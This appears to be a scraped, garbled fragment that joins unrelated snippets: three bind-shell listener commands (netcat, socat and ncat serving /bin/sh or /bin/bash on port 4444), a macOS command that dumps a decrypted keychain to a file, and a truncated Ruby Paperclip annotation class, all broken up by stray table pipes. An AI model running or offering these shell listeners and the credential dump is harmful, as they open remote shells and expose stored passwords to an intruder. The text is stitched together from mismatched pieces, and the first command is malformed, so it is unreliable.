nc - nlvp 4444 -e /bin/sh
socat tcp-listen:4444,reuseaddr,fork exec:/bin/bash
ncat --exec /bin/sh --allow 127.0.0.1 -vnl 4444 --ssl
Usage | |
dump decrypted keychain: | |
security dump-keychain -d keychain_name.keychain > decrypted_keychain | |
convert: |
module Paperclip | |
class Annotation < Thumbnail | |
attr_accessor :annotation_text | |
def initialize(file, options = {}, attachment = nil) | |
super | |
@geometry = options[:geometry] | |
@annotation_text = options[:annotation_text] |